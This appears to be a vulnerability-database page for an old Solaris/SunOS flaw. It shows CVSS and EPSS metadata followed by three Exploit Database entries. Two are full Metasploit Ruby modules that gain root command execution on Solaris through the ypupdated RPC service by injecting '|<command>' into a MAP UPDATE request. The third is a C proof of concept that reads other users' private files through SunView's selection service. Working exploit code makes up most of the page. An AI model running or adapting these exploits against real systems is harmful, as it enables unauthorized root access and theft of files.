Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:P/I:N/A:N |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 16326
Publication date : 2010-07-24 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: ypupdated_exec.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SunRPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris ypupdated Command Execution',
'Description' => %q{
This exploit targets a weakness in the way the ypupdated RPC
application uses the command shell when handling a MAP UPDATE
request. Extra commands may be launched through this command
shell, which runs as root on the remote host, by passing
commands in the format '|<command>'.
Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
ypupdated is started with the '-i' command-line option.
},
'Author' => [ 'I)ruid <
[email protected]>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9929 $',
'References' =>
[
['CVE', '1999-0209'],
['OSVDB', '11517'],
['BID', '1749'],
],
'Privileged' => true,
'Platform' => ['unix', 'solaris'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 12 1994'
))
register_options(
[
OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
OptInt.new('GID', [false, 'GID to emulate', 0]),
OptInt.new('UID', [false, 'UID to emulate', 0])
], self.class
)
end
def exploit
hostname = datastore['HOSTNAME']
program = 100028
progver = 1
procedure = 1
print_status('Sending PortMap request for ypupdated program')
pport = sunrpc_create('udp', program, progver)
print_status("Sending MAP UPDATE request with command '#{payload.encoded}'")
print_status('Waiting for response...')
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
command = '|' + payload.encoded
msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
sunrpc_call(procedure, msg)
sunrpc_destroy
print_status('No Errors, appears to have succeeded!')
rescue ::Rex::Proto::SunRPC::RPCTimeout
print_error('Warning: ' + $!)
end
end
Exploit Database EDB-ID : 5366
Publication date : 2008-04-03 22h00 +00:00
Author : I)ruid
EDB Verified : Yes
____ ____ __ __
/ \ / \ | | | |
----====####/ /\__\##/ /\ \##| |##| |####====----
| | | |__| | | | | |
| | ___ | __ | | | | |
------======######\ \/ /#| |##| |#| |##| |######======------
\____/ |__| |__| \______/
Computer Academic Underground
http://www.caughq.org
Exploit Code
===============/========================================================
Exploit ID: CAU-EX-2008-0001
Release Date: 2008.04.04
Title: ypupdated_exec.rb
Description: Solaris ypupdated Command Execution
Tested: Solaris x86/sparc 10, sparc 9, 8, 2.7
Attributes: Remote, NULL Auth, Elevated Privileges, Metasploit
Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0001.txt
Author/Email: I)ruid <druid (@) caughq.org>
===============/========================================================
Description
===========
This exploit targets a weakness in the way the ypupdated RPC application
uses the command shell when handling a MAP UPDATE request. Extra
commands may be launched through this command shell, which runs as root
on the remote host, by passing commands in the format '|<command>'.
Credits
=======
Josh D. <
[email protected]> from Avalon Security Research is
credited with originally discovering this vulnerability.
This Metasploit exploit module was modeled after kcope's exploit
released to Milw0rm on 2008.03.20.
References
==========
http://osvdb.org/displayvuln.php?osvdb_id=11517
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0209
https://www.securityfocus.com/bid/1749/info
http://www.milw0rm.com/exploits/5282
Metasploit
==========
require 'msf/core'
module Msf
class Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote
include Exploit::Remote::SunRPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris ypupdated Command Execution',
'Description' => %q{
This exploit targets a weakness in the way the ypupdated RPC
application uses the command shell when handling a MAP UPDATE
request. Extra commands may be launched through this command
shell, which runs as root on the remote host, by passing
commands in the format '|<command>'.
Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
ypupdated is started with the '-i' command-line option.
},
'Author' => [ 'I)ruid <
[email protected]>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 4498 $',
'References' =>
[
['BID', '1749'],
['CVE', '1999-0209'],
['OSVDB', '11517'],
],
'Privileged' => true,
'Platform' => ['unix', 'solaris'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
OptInt.new('GID', [false, 'GID to emulate', 0]),
OptInt.new('UID', [false, 'UID to emulate', 0])
], self.class
)
end
def exploit
hostname = datastore['HOSTNAME']
program = 100028
progver = 1
procedure = 1
print_status 'Sending PortMap request for ypupdated program'
pport = sunrpc_create('udp', program, progver)
print_status "Sending MAP UPDATE request with command '#{payload.encoded}'"
print_status 'Waiting for response...'
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
command = '|' + payload.encoded
msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
sunrpc_call(procedure, msg)
sunrpc_destroy
print_good 'No Errors, appears to have succeeded!'
rescue ::Rex::Proto::SunRPC::RPCTimeout
print_status 'Warning: ' + $!
print_status 'Exploit may or may not have succeeded.'
end
end
end
# milw0rm.com [2008-04-04]
Exploit Database EDB-ID : 19040
Publication date : 1990-08-13 22h00 +00:00
Author : Peter Shipley
EDB Verified : Yes
Source: https://www.securityfocus.com/bid/8/info
On Sun3 and Sun4 systems, a remote system can read any file that is readable to the user running SunView. On the 386i, a remote system can read any file on the workstation running SunView regardless of protections. Note that if root runs Sunview, all files are potentially accessible by a remote system.
Sunview does not kill the selection_svc process when the user quits from Sunview. Thus, unless the process is killed, remote systems can still read files that were readable to the last user that ran Sunview. Under these circumstances, once a user has run Sunview, start using another window system (such as X11), or even logoff, but still have files accessible to remote systems.
/* SELN_HOLD_FILE
* For use where someone has a selection_svc runnning as them, after an
* invocation of suntools:
*
* % cat their_private_file
* their_private_file: Permission denied
* % cc seln_hold_file.c -o seln_hold_file -lsuntool -lsunwindow
* % ./seln_hold_file their_private_file
* % get_selection 2
* < contents of their_private_file >
* %
*/
#include <stdio.h>
#include <sys/types.h>
#include <suntool/seln.h>
main(argc, argv)
int argc;
char *argv[];
{
Seln_result ret;
if (argc != 2) {
(void) fprintf(stderr, "usage: seln_grab file1\n");
exit(1);
}
ret = seln_hold_file(SELN_SECONDARY, argv[1]);
seln_dump_result(stdout, &ret);
printf("\n");
}
/*
* Local variables:
* compile-command: "cc -sun3 -Bstatic -o seln_hold_file seln_hold_file.c -lsun
tool -lsunwindow"
* end:
*
* Static required because _mem_ops not included in ld.so
*/
Products Mentioned
Configuraton 0
Sun>>Sunos >> Version 3.5
Sun>>Sunos >> Version 4.0
Sun>>Sunos >> Version 4.0.1
Sun>>Sunos >> Version 4.0.2
Sun>>Sunos >> Version 4.0.3
Sun>>Sunos >> Version 4.1
Sun>>Sunos >> Version 4.1.1
References